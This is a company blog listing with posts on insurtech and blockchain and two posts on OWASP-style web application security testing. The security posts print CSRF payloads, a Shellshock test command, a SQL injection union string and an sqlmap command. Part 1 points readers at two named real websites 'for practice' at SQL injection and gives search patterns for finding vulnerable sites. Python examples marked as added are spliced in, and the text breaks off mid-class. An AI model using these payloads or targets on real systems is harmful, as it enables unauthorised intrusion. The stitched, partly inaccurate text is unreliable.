Posts by mantra-admin

Insurance sector is getting renovated with these technologies


After technology's entry into the finance sector as FinTech, the insurance sector is ready to make its own buzz. The term InsurTech, a combination of the words insurance and technology, is a segment sure to gain the attention of innovators in the coming years.

Artificial Intelligence, Machine Learning and Blockchain will be the hottest technologies to watch in the insurance sector. All of these technology interventions are helping the insurance sector offer customer-oriented solutions that manage price, risk, cost and customization.

According to the report, Insurtech will take home 86 million policies by 2022 (https://www.enterpriseinnovation.net/article/insurtech-take-home-86-million-policies-2022-1956640660).

Insurers are increasingly investing in the latest technologies in order to improve their customer experience. Investment in AI applications increased from $4.0 billion (2015) to $5.0 billion (2016).

Let's take a look at the benefits and use cases of these technologies.

Artificial Intelligence/Machine Learning:

AI/ML can help tremendously in the insurance sector with the payment of premiums and claims; insurance also has much to do in terms of customer engagement.

Use cases of AI/ML

  1. Claim management: Claims management can be augmented using machine learning techniques at different stages of the claim handling process. By leveraging AI to handle massive amounts of data in a short time, insurers can reduce the overall processing time.
  2. Marketing and customer experience: Improving the customer experience by using customer data, usage and demographics.
  3. Telematics: Telematics gathers the history of speed, turning and braking patterns, distance, time of day and many such things, which could assist in judging a driver's driving ability and issuing an insurance policy accordingly.

Blockchain:

Blockchain/Bitcoin has great potential to bring revolution to the finance and insurance industries. Blockchain is going to change the way data is processed and the way investments are handled.

The potential use cases of blockchain build on its properties: Distributed Ledger Technology ('DLT'), anonymised processing, immutability and encryption.

1. Decentralized cloud storage across the network.

2. HR Management – Resume authentication for job hunters. Background verification without using third-party consultancies.

3. Supply Chain Management & Transparency – Banks and insurers can create performance management programs to increase engagement.

4. Vehicle Leasing system – Complex vehicle supply chain management can be done using Blockchain and smart contracts.

Takeaway:

Let's take this opportunity to explore new dimensions of the business and let robotics take command. It's time to say goodbye to the age-old processes and welcome the whole new world of technologies in insurance.


Business Applications of Blockchain

What is Blockchain:

  • A distributed ledger – It tracks ownership of assets and identities through their history, and everyone has a copy.
  • Unique tokens – Long numbers are tracked through the ledger.
  • Anonymized processing / mining – Transactions are processed by miners.
  • Immutable, encrypted, pseudo-anonymous – Transactions are immutable once they have happened, and are encrypted.
  • Consensus mechanisms – As long as 51% of the network agree, it holds.

Is The Blockchain a New Web 3.0?

The blockchain gives internet users the ability to create value. It may revolutionize the future, and in a couple of places it is making a difference today.

12 potential business applications of blockchain are listed below.

Smart Contracts – Distributed ledgers enable the coding of simple contracts that will execute once the specified conditions are met.

The Sharing Economy – By enabling peer-to-peer payments, blockchain opens the door to direct interaction between parties; a truly sharing economy results.

Crowdfunding – Blockchain takes this interest to the next level, potentially creating crowd-sourced venture capital funds.

Governance – By making the results fully transparent and publicly accessible, distributed database technology could bring full transparency to elections or any other kind of poll taking. Ethereum-based smart contracts help to automate the process.

Supply chain auditing – Distributed ledgers provide an easy way to certify that the backstories of the things we buy are genuine. Transparency comes with blockchain-based timestamping of date and location.

File Storage – Decentralized file storage on the internet brings clear benefits. Distributing data throughout the network protects files from getting hacked or lost.

Protection of Intellectual Property – Smart contracts can protect copyright and automate the sale of creative works online, eliminating the risk of copying and redistribution.

Internet of Things (IoT) – Smart contracts make the automation of remote systems management possible. A combination of software, sensors and the network facilitates an exchange of data between objects and mechanisms.

Identity Management – Distributed ledgers offer enhanced methods for proving who you are. Having secured identity will also be important for online interactions – for instance, in the sharing economy.

Data Management – In the future, users will have the ability to manage and sell the data their online activity generates. Because it can be easily distributed in small fractional amounts, Bitcoin – or something like that.

Land title registration – As publicly accessible ledgers, blockchains can make all kinds of record-keeping more efficient. Property titles are a case in point. They tend to be susceptible to fraud, as well as costly and labor-intensive to administer.

Stock Trading – When executed peer-to-peer, trade confirmations become almost instantaneous. This means intermediaries, such as auditors and custodians, get removed from the process.

What Problems does Blockchain solve?
Removal of the middlemen makes the system decentralized. There is no single entity that controls the network; instead, it is analogous to BitTorrent. Own your own data in the new Data Economy.


The Central Point of Failure – Relying on a central server that holds all the data is risky in case of a hacker's attack on that server. Blockchain technology moves us towards a permanent web, a web where links never die. Stupid 404!!!

Establishing transparency makes the system trustless. In other words, there is no need to put trust in the peers, as the designed system is highly tamper-resistant.

Faster Data Transfer – A peer-to-peer network makes the transfer of data super fast compared to a central server serving the data.

In general, Blockchain is creating a world with more and more value. It can be applied to any need for a trustworthy system of record.


What is Blockchain Technology?

“Bitcoin is just one example of something that uses a blockchain. Cryptocurrencies are just one example of decentralized technologies. And now that the Internet is big enough and diverse enough, I think we will see different flavors of decentralized technologies and blockchains. I think decentralized networks will be the next huge wave in technology. The blockchain allows our smart devices to speak to each other better and faster.” – Melanie Swan, author of Blockchain: Blueprint for a New Economy (2015)

Blockchain is now driving the biggest revolution in the finance industry. As technologists, we should evaluate and apply the concept of blockchain without thinking of cryptocurrency. It can unveil many possibilities and can lead to innovations. Cryptocurrency is becoming a distraction from the possibilities of blockchain, as people have started using the two terms interchangeably.

What is blockchain technology and why is it safe?

Blockchain provides a protocol for building a shared, replicated and distributed online ledger network. Each participant in this blockchain network maintains their own copy of that database, or collection of organized information.

Simply put, a blockchain is made up of a series of blocks of data that are securely tied together. Since all records are connected to each other, they are entrenched. It is impossible to modify or alter a previous record without changing the copy held by every participant in the blockchain.
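The "tied together" claim above is a hash link: each block's hash covers the previous block's hash. The following added example (not from the original post; the ledger records are constructed) builds such a chain and shows that altering one historical record breaks the link at that block, that re-hashing only the altered block merely moves the break to the next one, and that only the newest block can be rewritten quietly, which is exactly why every participant's copy and the consensus rule matter.

```python
import hashlib
import json
from typing import List, Optional

GENESIS_PREV = "0" * 64   # the first block has no predecessor


def block_hash(block: dict) -> str:
    """Hash over index, data and prev_hash. Because prev_hash is part of the
    input, every block commits to the whole history before it."""
    payload = json.dumps(
        {"index": block["index"], "data": block["data"], "prev_hash": block["prev_hash"]},
        sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()


def append_block(chain: List[dict], data: str) -> dict:
    prev_hash = chain[-1]["hash"] if chain else GENESIS_PREV
    block = {"index": len(chain), "data": data, "prev_hash": prev_hash}
    block["hash"] = block_hash(block)
    chain.append(block)
    return block


def first_broken_block(chain: List[dict]) -> Optional[int]:
    """Index of the first block whose link or hash is inconsistent, or None if intact."""
    for i, block in enumerate(chain):
        expected_prev = chain[i - 1]["hash"] if i > 0 else GENESIS_PREV
        if block["prev_hash"] != expected_prev or block["hash"] != block_hash(block):
            return i
    return None


def build_sample_chain() -> List[dict]:
    """Constructed ledger entries for the example (an insurance-flavoured history)."""
    chain: List[dict] = []
    for record in ("policy P-1 issued", "claim C-7 filed", "claim C-7 paid"):
        append_block(chain, record)
    return chain


def tamper(chain: List[dict], index: int, new_data: str, rehash: bool) -> Optional[int]:
    """Alter one historical record, optionally recomputing that block's own hash,
    and report where a verifier first notices."""
    chain[index]["data"] = new_data
    if rehash:
        chain[index]["hash"] = block_hash(chain[index])
    return first_broken_block(chain)
```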

There is some disruption too

Contracts, transactions and ledgers are the defining structures that set the boundaries of our economic, legal and political systems. Today these involve people, and corruption. With blockchain, contracts can be embedded in digital code, stored in shared databases and protected from tampering.

Blockchain may be disruptive, but the question is if it’s too disruptive for its own good.

Although blockchain is one of the hottest and most intriguing technologies currently in the market, it comes with its own challenges. Many business leaders and industrialists are skeptical about blockchain.

Let's see what those skeptics say:

  • It will be hard for established businesses in industries where blockchain will push uncomfortable transparency, which can lead to price corrections and changes in business models. The disruption can be so great that it leads to the foundation of new technologies.
  • Adoption problems of blockchain technology.
  • Time-consuming: Blockchain-based transactions can only complete when all parties update their respective ledgers, which is a very time-consuming process.

Eight reasons to be skeptical about blockchain.


Web Application Security Testing – Part 2

We discussed security testing of web applications in last week's article. Here is the list of the remaining web application security testing topics.

6. SENSITIVE DATA EXPOSURE

Already explained under Broken Authentication and Session Management.

Examples of vulnerable application

  • Data stored in plain text, such as passwords or credit card data (see the first well-known event)
  • Lack of HTTPS on authenticated pages
  • Hashed passwords with lack of salt, making the password easily cracked
  • Tokens disclosed in public source code
  • Browser header caching sensitive data

7. CROSS SITE FORGERY

In Cross-Site Request Forgery (CSRF) attacks, also known as XSRF or session riding, an attacker forces a victim to make an unexpected web request such as a fraudulent bank transaction. For example, an attacker tricks the victim client into calling a banking function in a vulnerable page that transfers money from the victim's account to the attacker's. The victim triggers the attack by following an attacker's link or visiting an attacker's page. The vulnerable server page doesn't recheck the authenticity of the victim's request and allows the transfer to proceed.

The following steps detail the anatomy of a CSRF attack:

  1. Attacker finds functionality in a web application that is vulnerable to CSRF.
  2. Attacker builds a link invoking the vulnerable function and passing the parameters required to execute the chosen attack.
  3. Attacker waits until the victim client authenticates with the vulnerable web application.
  4. Attacker tricks victim client into following the malicious link.
  5. Victim client sends forged request to vulnerable server.
  6. Vulnerable server allows and executes the forged request.

For example, the link might look like this when the payload is to transfer money from the victim's account to the attacker's:

/makeTransfer?amount=1000&dest=attacker@attackersite.com

The link below sends an email titled Hello to johny@example.com :

/sendMail?to=johny@example.com&title=Hello&body=I+did+not+send+this

Basic Test for Cross-site Request Forgery

Follow these test steps to test against CSRF bugs.

->Find a web application page that performs an action based on a user request.

->Construct a page containing a link or redirect that sends a forged request to the application server. This link usually contains a tag such as an img or iframe (although almost any tag can be used) with the source address pointing to the request:

<a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>

<img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">

->Note that the links above will both generate a GET request. In order to test for POST requests you must create a page containing a form with the URL parameters passed as hidden input, and add a script to automatically submit the form:

<form action="http://bank.com/transfer.do" method="post">
     <input type="hidden" name="acct" value="MARIA">
     <input type="hidden" name="amount" value="100000">
</form>

<script>
     document.forms[0].submit();
</script>

->Open an Internet browser and log in to the web application as a legitimate user.

->Open the page built in step 2 (follow the link if necessary).

->Confirm if the request was successful.

->Repeat test case for every application create/update/delete/mail action.

Expected result: the test fails if the application trusts and processes the forged request.

–Also the cookies can be manipulated.

Another example,

Suppose, we allow users to post images on our forum. What if one of our users posted this image?

<img src="http://foo.com/logout">

Not really an image, true, but it will force the target URL to be retrieved by any random user who happens to browse that page, using their browser credentials! From the web server's perspective, there is no difference whatsoever between a real user-initiated browser request and the above image URL retrieval.

If our logout page was a simple HTTP GET that required no confirmation, every user who visited that page would immediately be logged out.
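The server-side fix for everything above is the same: never change state on a GET, require a per-session synchronizer token that other origins cannot read, and check Origin/Referer as defence in depth. The following added example (not code from the original article; bank.com is the host from its examples, attacker.example is a constructed attacker page) models the article's three forgeries as the server sees them and shows each being refused while the site's own form succeeds.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

SITE_HOST = "bank.com"   # the host used in the article's examples


class Session:
    """Server-side session. The CSRF token is minted once per session and is only
    ever embedded in pages this site serves, so another origin never learns it."""
    def __init__(self, user: str):
        self.user = user
        self.csrf_token = secrets.token_urlsafe(32)


class Request:
    def __init__(self, method: str, path: str, params: Dict[str, str],
                 session: Optional[Session], headers: Optional[Dict[str, str]] = None):
        self.method = method
        self.path = path
        self.params = params        # query string for GET, form body for POST
        self.session = session      # present because the browser attached the cookie
        self.headers = headers or {}


def csrf_rejection(req: Request) -> Optional[str]:
    """Reason a state-changing request must be refused, or None if it may proceed."""
    if req.session is None:
        return "not authenticated"
    if req.method != "POST":
        # The <a> and <img> tricks produce GETs: a GET must never change state.
        return "state change attempted via " + req.method
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if source:
        parts = urlsplit(source)
        if parts.scheme != "https" or parts.hostname != SITE_HOST:
            return "cross-origin request from " + source
    token = req.params.get("csrf_token", "")
    if not token or not hmac.compare_digest(token, req.session.csrf_token):
        return "missing or invalid CSRF token"   # attacker pages cannot supply it
    return None


def transfer_do(req: Request) -> Tuple[int, str]:
    reason = csrf_rejection(req)
    if reason:
        return 403, reason
    return 200, f"moved {req.params['amount']} from {req.session.user} to {req.params['acct']}"


def logout(req: Request) -> Tuple[int, str]:
    # The forum <img src=".../logout"> trick only works if logout accepts a bare GET.
    reason = csrf_rejection(req)
    if reason:
        return 403, reason
    return 200, "logged out"


def forged_requests(victim: Session) -> Dict[str, Request]:
    """The article's three forgeries: the victim's cookie (session) rides along,
    the token does not, and the browser reports the attacker's page as source."""
    from_attacker_page = {"Referer": "https://attacker.example/page"}   # constructed
    return {
        "img_get": Request("GET", "/transfer.do", {"acct": "MARIA", "amount": "100000"},
                           victim, from_attacker_page),
        "auto_post": Request("POST", "/transfer.do", {"acct": "MARIA", "amount": "100000"},
                             victim, {"Origin": "https://attacker.example"}),
        "forum_img_logout": Request("GET", "/logout", {}, victim, from_attacker_page),
    }


def legitimate_transfer(victim: Session) -> Request:
    """A submission of this site's own form carries the session's token."""
    return Request("POST", "/transfer.do",
                   {"acct": "MARIA", "amount": "100000", "csrf_token": victim.csrf_token},
                   victim, {"Origin": "https://" + SITE_HOST})
```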

Examples of cross site forgery,

https://hackerone.com/reports/196458

https://hackerone.com/reports/192131

https://hackerone.com/reports/157993

https://hackerone.com/reports/155774

8. MISSING FUNCTION LEVEL ACCESS CONTROL

If the authentication or authorization check in sensitive request handlers is insufficient or non-existent, the vulnerability can be categorised as Missing Function Level Access Control.

To test for missing function level access control:

The best way to find out if an application has failed to properly restrict function level access is to verify every application function:

  1. Does the UI show navigation to unauthorized functions?
  2. Are server side authentication or authorization checks missing?
  3. Are server side checks done that solely rely on information provided by the attacker?

Using a proxy, browse the application with a privileged role. Then revisit the restricted pages using a less privileged role. If the server responses are alike, the My Organisation application is probably vulnerable.

In one potential scenario an attacker simply force browses to target URLs. Consider the following (non-My Organisation) URLs which are both supposed to require authentication. Admin rights are also required for access to the “admin_getappInfo” page.

http://example.com/app/getappInfo

http://example.com/app/admin_getappInfo

If the attacker is not authenticated, and access to either page is granted, then unauthorized access was allowed. If an authenticated, non-admin, user is allowed to access the “admin_getappInfo” page, this is a flaw, and may lead the attacker to more improperly protected admin pages.

Example:

https://hackerone.com/reports/27404
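The following added example (not from the original article; the route handlers and the test identities are constructed) puts the two URLs above behind a dispatcher in two versions: one whose only "check" trusts a role value supplied by the requester (checklist item 3), and one that consults the role recorded in the server's own session. The audit function performs the proxy test described above: fetch each page as admin, then as anonymous and as a plain user, and flag every page where the lower-privileged identity gets the same 200 the admin got.

```python
from typing import Callable, Dict, List, Optional, Tuple

ROLE_RANK = {"anonymous": 0, "user": 1, "admin": 2}

# The two URLs from the article and the role each is supposed to require.
ROUTES: Dict[str, Tuple[str, Callable[[str], str]]] = {
    "/app/getappInfo": ("user", lambda name: f"app info for {name}"),
    "/app/admin_getappInfo": ("admin", lambda name: f"ADMIN app info for {name}"),
}

Dispatcher = Callable[[str, Optional[dict], Dict[str, str]], Tuple[int, str]]


def dispatch_vulnerable(path: str, session_user: Optional[dict],
                        params: Dict[str, str]) -> Tuple[int, str]:
    """Flawed: the role is taken from a request parameter the site's own forms
    send as a hidden field, so anyone can send role=admin themselves."""
    route = ROUTES.get(path)
    if route is None:
        return 404, "not found"
    required, handler = route
    claimed = params.get("role") or (session_user["role"] if session_user else "anonymous")
    if ROLE_RANK.get(claimed, 0) < ROLE_RANK[required]:
        return 403, "forbidden"
    return 200, handler(session_user["name"] if session_user else "guest")


def dispatch_checked(path: str, session_user: Optional[dict],
                     params: Dict[str, str]) -> Tuple[int, str]:
    """Server-side check against the role the server itself stored at login;
    nothing in the request influences the decision."""
    route = ROUTES.get(path)
    if route is None:
        return 404, "not found"
    required, handler = route
    if session_user is None:
        return 401, "login required"
    if ROLE_RANK[session_user["role"]] < ROLE_RANK[required]:
        return 403, "forbidden"
    return 200, handler(session_user["name"])


def force_browse_audit(dispatch: Dispatcher) -> List[str]:
    """The article's test: compare the admin's responses with those of lower
    identities that force-browse the same URLs (also trying a forged parameter)."""
    admin = {"name": "ann", "role": "admin"}          # constructed identities
    lower_identities = [None, {"name": "bob", "role": "user"}]
    findings = []
    for path, (required, _) in ROUTES.items():
        admin_status, _ = dispatch(path, admin, {})
        for identity in lower_identities:
            role = identity["role"] if identity else "anonymous"
            if ROLE_RANK[role] >= ROLE_RANK[required]:
                continue                                # entitled anyway, nothing to flag
            for params in ({}, {"role": "admin"}):
                status, _ = dispatch(path, identity, params)
                if status == admin_status == 200:
                    findings.append(f"{path} reachable as {role}")
                    break
    return findings
```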

9. SHELLSHOCK & HEARTBLEED

Shellshock:

Shellshock is a remote command execution vulnerability in Bash. A specific sequence of characters, () { :; };, confuses Bash because it doesn't know what to do with them, so by default it executes the code that follows.

Good read: http://garage4hackers.com/showthread.php?t=6902

Tools used to check Shellshock:

Through command line:

  To determine if your Linux or Unix system is vulnerable, from a command line, type:

        env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

 If the system is vulnerable, the output will be:

 vulnerable
 this is a test

 An unaffected (or patched) system will output:

 bash: warning: x: ignoring function definition attempt
 bash: error importing function definition for `x'
 this is a test

Online tools:

https://pentest-tools.com/network-vulnerability-scanning/bash-shellshock-scanner

http://shellshock.brandonpotter.com/

http://shellshock.iecra.org/

Heartbleed:

It is a critical bug in OpenSSL's implementation of the TLS/DTLS heartbeat extension that allows attackers to read portions of the affected server's memory, potentially revealing user data that the server did not intend to reveal.

An attacker can trick OpenSSL into allocating a 64KB buffer, copying more bytes than necessary into the buffer and sending that buffer back, thus leaking the contents of the victim's memory, 64KB at a time.

Tools used for Heartbleed:

defribulator v1.16

Command→ python ssltest.py example.com (ssltest.py file is available with me)

Online test tool : https://filippo.io/Heartbleed/

Good read : https://blog.bugcrowd.com/heartbleed-exploit-yet/ , http://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html

For Android you can download the Bluebox OpenSSL scanner.

Prevention

  • Upgrade the OpenSSL version to 1.0.1g
  • Request revocation of the current SSL certificate
  • Regenerate your private key
  • Request and replace the SSL certificate

Examples of Heartbleed:

https://hackerone.com/reports/49139

https://hackerone.com/reports/44294

https://hackerone.com/reports/6566

https://hackerone.com/reports/6475

10. UNVALIDATED REDIRECTS AND FORWARDS

Unvalidated redirect vulnerabilities occur when an attacker is able to redirect a user to an untrusted site after the user follows a link located on a trusted website. This vulnerability is also often called Open Redirect.

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

How to test?

Spider the site to see if it generates any redirects (HTTP response codes 300-307, typically 302). Look at the parameters supplied prior to the redirect to see if they appear to be a target URL or a piece of such a URL. If so, change the URL target and observe whether the site redirects to the new target.

Preventing Unvalidated Redirects and Forwards

  • Simply avoid using redirects and forwards.
  • If used, do not allow the URL itself as user input for the destination. This can usually be done. Where it cannot, you should have a method to validate the URL.
  • If user input can’t be avoided, ensure that the supplied value is valid, appropriate for the application, and is authorized for the user.
  • It is recommended that any such destination input be mapped to a value, rather than the actual URL or portion of the URL, and that server side code translate this value to the target URL.
  • Sanitize input by creating a list of trusted URLs (a list of hosts or a regex).
  • Force all redirects to first go through a page notifying users that they are going off of your site, and have them click a link to confirm.
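The two defensive options above, mapping a key to a server-side destination and validating a user-supplied URL against a trusted-host list, as an added example (not from the original article; www.example.com, help.example.com and the destination table are assumptions). The validator handles the inputs that commonly slip past naive checks: scheme-relative //host, backslashes, userinfo tricks, look-alike subdomains and non-http schemes; anything doubtful falls back to the home page.

```python
from typing import Dict
from urllib.parse import urljoin, urlsplit

OUR_HOST = "www.example.com"                      # assumption: the site's own host
ALLOWED_HOSTS = {OUR_HOST, "help.example.com"}    # assumption: the trusted-host list
HOME = f"https://{OUR_HOST}/"

# Preferred option: the request carries a short key, never a URL.
DESTINATIONS: Dict[str, str] = {                  # assumption: the site's own table
    "account": f"https://{OUR_HOST}/account",
    "help": "https://help.example.com/start",
}


def redirect_by_key(key: str) -> str:
    """Server-side lookup; an unknown or attacker-chosen key goes home."""
    return DESTINATIONS.get(key, HOME)


def validated_redirect(user_value: str) -> str:
    """Fallback when a URL must be accepted: normalise, then allow only https URLs
    whose host is on the list. Every rejection returns HOME rather than erroring."""
    value = user_value.strip()
    if not value or any(ord(c) < 32 for c in value) or "\\" in value:
        return HOME                       # control chars; browsers read "\evil" as "//evil"
    try:
        parts = urlsplit(value)
    except ValueError:
        return HOME
    if parts.scheme and parts.scheme not in ("http", "https"):
        return HOME                       # javascript:, data: and friends
    if parts.netloc == "" and not value.startswith("//"):
        resolved = urljoin(HOME, value)   # site-relative path: resolve against our origin
    else:
        resolved = value                  # absolute or scheme-relative: judge as given
    try:
        final = urlsplit(resolved)
    except ValueError:
        return HOME
    if final.scheme != "https":
        return HOME                       # also rejects //evil.example (empty scheme)
    if final.username is not None or final.password is not None:
        return HOME                       # https://www.example.com@evil.example
    if final.hostname not in ALLOWED_HOSTS:
        return HOME                       # www.example.com.evil.example and the like
    return resolved
```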

Example:

https://hackerone.com/reports/175168

https://hackerone.com/reports/169759

This article is written by our QA Rijin Raj.


Web Application Security Testing – Part 1


The Open Web Application Security Project (OWASP) is an international organization dedicated to enhancing the security of web applications.

The session was held at Mantra Labs by one of our experienced test engineers, Rijin. Here he discussed the current top 10 web application security risks worldwide. The list describes each vulnerability, provides examples, and offers suggestions on how to avoid it.

The top 10 web application security risks worldwide are:

  1. Injection
  2. Broken authentication and session management
  3. Cross-site scripting
  4. Indirect object security reference
  5. Security misconfiguration
  6. Sensitive data exposure
  7. Missing function level access control
  8. Cross site forgery
  9. Using components with known vulnerabilities: Heartbleed and Shellshock
  10. Unvalidated redirects and forwards

Link to Hackerone Bug reports:

https://h1.sintheticlabs.com/

From here you can gain an understanding of ongoing security issues and bugs, and of how hackers are exploiting web applications. Various security/penetration bugs are listed here.

https://www.exploit-db.com/exploits/42309/


  1. INJECTION

This is when an attacker sends rogue content to a web application interpreter, causing the interpreter to execute unauthorized commands. The most common of the code injection attacks are SQL Injections, also known as SQLi. An SQLi attack is carried out when malformed code is sent to the database server, leading to the exposure of your data. This attack style is so simple and easy that anyone with access to the internet can do it: SQLi scripts are available for download and can be acquired easily.

How is it done?

The character ' is entered into the search field, and pressing the button leads to an error page which displays more information than needed.

This example showcases a badly and insecurely programmed application that is incapable of handling SQL injection. Just a few illegal characters and a little sniffing around lead the hacker to this string: ' union select password from users; . He can then use this finding to harvest usernames and passwords from the database. This is just one basic way to exploit application databases.
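The following added example (not from the original article; the in-memory tables are constructed) reproduces the paragraph's two observations against a vulnerable search function, the single quote producing a database error and the union payload returning the users table's passwords, and shows the parameterised version of the same query treating both inputs as harmless values. The payload is the article's string with a trailing SQL comment marker so the rest of the original query is discarded.

```python
import sqlite3
from typing import List, Optional

PROBE = "'"                                         # the single-character probe
UNION_PAYLOAD = "' union select password from users--"   # the article's string plus "--"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the application's own."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products (name) VALUES (?)", [("lamp",), ("chair",)])
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[str]:
    """The search field's text is pasted into the SQL string: data becomes code."""
    sql = "SELECT name FROM products WHERE name = '" + term + "'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterised(conn: sqlite3.Connection, term: str) -> List[str]:
    """Same query with a bound parameter: the term can only ever be a value,
    so quotes and keywords inside it have no SQL meaning."""
    return [row[0] for row in conn.execute(
        "SELECT name FROM products WHERE name = ?", (term,))]


def error_leaked(conn: sqlite3.Connection, term: str) -> Optional[str]:
    """What the 'error page' in the paragraph would have shown for this input
    (None when the query ran cleanly)."""
    try:
        search_vulnerable(conn, term)
        return None
    except sqlite3.Error as exc:
        return str(exc)
```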

Tool commonly used for SQL Injection

SQLmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

It is commonly used on Kali Linux.

After finding a vulnerable page you can enumerate the databases by typing:

sqlmap -u (url) --dbs

Guide to exploit via sqlmap

https://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/

https://www.hackers-arise.com/single-post/2017/01/20/Database-Hacking-Part-3-Using-sqlmap-for-SQL-Injection-Against-MySQL-and-WordPress

For practice you can use the following websites:

http://www.shumka.com/shumka-at-50/news/index.php?id=847

http://waytogonatural.com/product_detail.php?ID=4526

You can also find SQL vulnerable website on your own. You just have to look for

  • php?id=(any Number)
  • login.php?id=(any number)
  • index.php?id=(any number)

Examples of SQL injection:

https://hackerone.com/reports/200818

https://hackerone.com/reports/179751

2. BROKEN AUTHENTICATION AND SESSION MANAGEMENT

Incorrect implementation of authentication schemes and session management can allow unauthorized users to assume the identities of valid users.

Broken Authentication and Session Management attacks are anonymous attacks with the intention of retrieving passwords, user account information, IDs and other details.

Key Points to check if you are vulnerable:

  1. User authentication credentials aren't protected by hashing or encryption when stored.
  2. Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).
  3. Session IDs are exposed in the URL (e.g., URL rewriting).
  4. Session IDs are vulnerable to session fixation attacks.
  5. Session IDs don’t timeout, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren’t properly invalidated during logout.
  6. Session IDs aren’t rotated after successful login.
  7. Passwords, session IDs, and other credentials are sent over unencrypted connections.

Examples of attack scenarios:

Scenario #1:

Airline reservations application supports URL rewriting, putting session IDs in the URL:

http://example.com/sale/saleitems?sessionid=268544541&dest=Hawaii

An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.

Scenario #2:

The application's timeouts aren't set properly. A user uses a public computer to access the site. Instead of selecting “logout”, the user simply closes the browser tab and walks away. An attacker uses the same browser an hour later, and that browser is still authenticated.

Scenario #3:

An insider or external attacker gains access to the system's password database. User passwords are not properly hashed, exposing every user's password to the attacker.

Vulnerability to ‘Sensitive Data exposure’:


  1. Is any of this data stored in clear text long term, including backups of this data?
  2. Is any of this data transmitted in clear text, internally or externally? Internet traffic is especially dangerous.
  3. Are any old / weak cryptographic algorithms used?
  4. Are weak crypto keys generated, or is proper key management or rotation missing?
  5. Are any browser security directives or headers missing when sensitive data is provided by / sent to the browser? (Nikto)

Prevention from Sensitive data exposure:

  1. Make sure you encrypt all sensitive data.
  2. Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t have can’t be stolen.
  3. Ensure strong standard algorithms and strong keys are used, and proper key management is in place.
  4. Ensure passwords are stored with an algorithm specifically designed for password protection, such as bcrypt, PBKDF2, or scrypt.
  5. Disable autocomplete on forms collecting sensitive data and disable caching for pages that contain sensitive data.

Protection against broken authentication and session management:

Password Strength

-Minimum size and complexity.

-Complexity depends on the usage of combinations of alphabetic, numeric, and/or non-alphanumeric characters.

-Change password periodically.

-Prevent reuse of previous passwords.

Password Use 

-Restrict to a defined number of login attempts per unit of time, and repeated failed login attempts should be logged.

-The system should not indicate whether it was the username or the password that was wrong if a login attempt fails.

Password Change Controls 

-Users should always be required to provide both their old and new password when changing their password.

-If forgotten passwords are emailed to users, the system should require the user to reauthenticate whenever the user is changing their e-mail address; otherwise an attacker who temporarily has access to their session (e.g., by walking up to their computer while they are logged in) can simply change their e-mail address and request a ‘forgotten’ password be mailed to them.

Password Storage 

-Passwords must be stored in either hashed or encrypted form

-Encryption should be used when the plain text password is needed

Session ID Protection

-A user's entire session should be protected via SSL.

-Session IDs should never be included in the URL, as they can be cached by the browser.

-Session IDs should be long, complicated, random numbers that cannot be easily guessed.

-Session IDs can also be changed frequently during a session to reduce how long a session ID is valid. Session IDs must be changed when switching to SSL, authenticating, or at other major transitions.

Browser Caching 

-Authentication and session data should never be submitted as part of a GET; POST should always be used instead.

-Authentication pages should be marked with all varieties of the no-cache tag to prevent someone from using the back button in a user's browser to return to the login page and resubmit the previously typed-in credentials.
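The storage, login-attempt and session-ID rules above, as an added example (not code from the original article). It implements the "Key Points" list in reverse: salted PBKDF2 password hashes compared in constant time, a uniform failure for wrong username and wrong password, a lockout after repeated failures, session IDs drawn from the CSPRNG and rotated on login (which also defeats session fixation), an idle timeout, and server-side invalidation on logout. The iteration count, timeout and lockout numbers are assumptions; the clock is injectable so the timeout can be exercised without waiting.

```python
import hashlib
import hmac
import os
import secrets
import time
from typing import Dict, List, Optional

PBKDF2_ITERATIONS = 600_000      # assumption: choose so one hash costs ~100 ms on your hardware
SESSION_IDLE_SECONDS = 15 * 60   # assumption: idle timeout before a session is dropped
MAX_FAILED_LOGINS = 5            # assumption: failures allowed per LOCKOUT_WINDOW seconds
LOCKOUT_WINDOW = 10 * 60


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """PBKDF2-HMAC-SHA256 with a random per-user salt; the stored string carries
    its own parameters so the iteration count can be raised later per user."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


# Verified against when the username is unknown, so response time and error are the
# same for a wrong username and a wrong password.
DUMMY_HASH = hash_password(secrets.token_hex(16))


class AuthServer:
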